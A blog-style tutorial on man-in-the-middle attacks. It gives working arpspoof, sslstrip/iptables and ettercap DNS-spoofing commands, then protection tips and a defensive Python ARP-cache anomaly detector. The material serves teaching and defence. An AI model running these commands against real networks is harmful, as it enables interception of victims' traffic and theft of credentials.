
Man-in-the-Middle Attacks — Intercept Any Communication

Anuj Singh (Admin), 31 March 2026

Man-in-the-Middle (MITM) Attacks

In a MITM attack, the attacker positions themselves between the victim and the server, intercepting all communication.

ARP Spoofing

# Using arpspoof
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t victim_ip gateway_ip
arpspoof -i eth0 -t gateway_ip victim_ip

With both the victim's and the gateway's ARP caches poisoned, all traffic between the victim and the gateway now flows through the attacker's machine.

SSL Stripping

# Using sslstrip
sslstrip -l 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

SSL stripping downgrades the victim's connection from HTTPS to HTTP. The victim thinks the session is secure, but it is not.

DNS Spoofing

# Modify /etc/ettercap/etter.dns
google.com A attacker_ip
*.google.com A attacker_ip

# Run ettercap
ettercap -T -q -i eth0 -M arp:remote /victim_ip// /gateway_ip// -P dns_spoof

What Can Be Intercepted

  • 🔴 Login credentials (HTTP sites)
  • 🔴 Email content
  • 🔴 Chat messages (unencrypted)
  • 🔴 File transfers
  • 🔴 Banking transactions (if SSL stripped)

Protection

  • 🔒 Use HTTPS everywhere
  • 🔒 VPN on public networks
  • 🔒 HSTS preload list
  • 🔒 Certificate pinning in apps
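
The ARP spoofing described above leaves a visible trace in a host's ARP cache: the gateway's IP suddenly maps to a new MAC, and that MAC also answers for another host. The following is an added detection example, not code from the original post; it compares two snapshots in Linux `/proc/net/arp` format, and the sample tables, addresses and function names are constructed for illustration.

```python
"""Flag ARP-cache states consistent with ARP spoofing (defensive check)."""
from collections import defaultdict

# Constructed samples in /proc/net/arp format (all addresses are made up).
BASELINE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.1.23     0x1         0x2         de:ad:be:ef:00:23     *        eth0
192.168.1.40     0x1         0x0         00:00:00:00:00:00     *        eth0
"""
POISONED = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         DE:AD:BE:EF:00:23     *        eth0
192.168.1.23     0x1         0x2         de:ad:be:ef:00:23     *        eth0
"""

def parse_arp(text):
    """Return {(device, ip): mac} for resolved entries only."""
    table = {}
    for line in text.splitlines()[1:]:          # first line is the header
        f = line.split()
        if len(f) < 6:
            continue
        ip, flags, mac, dev = f[0], f[2], f[3].lower(), f[5]
        if int(flags, 16) & 0x2 == 0 or mac == "00:00:00:00:00:00":
            continue                            # incomplete entry, no MAC learned
        table[(dev, ip)] = mac
    return table

def find_anomalies(baseline, current):
    """Compare two snapshots; return a sorted list of (kind, detail) findings."""
    findings = []
    for key, mac in current.items():
        old = baseline.get(key)
        if old and old != mac:                  # known IP now maps to a new MAC
            findings.append(("mac_changed", f"{key[1]} on {key[0]}: {old} -> {mac}"))
    owners = defaultdict(set)
    for (dev, ip), mac in current.items():
        owners[(dev, mac)].add(ip)
    for (dev, mac), ips in owners.items():
        if len(ips) > 1:                        # one MAC answering for several IPs
            findings.append(("mac_shared", f"{mac} on {dev} claims {', '.join(sorted(ips))}"))
    return sorted(findings)

if __name__ == "__main__":
    for kind, detail in find_anomalies(parse_arp(BASELINE), parse_arp(POISONED)):
        print(f"[{kind}] {detail}")
```

On a live Linux host, pass the contents of `/proc/net/arp` as the current snapshot. A shared MAC can be legitimate (proxy ARP, a router with several addresses), so treat `mac_shared` as a lead to verify, while a changed gateway MAC warrants immediate investigation.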
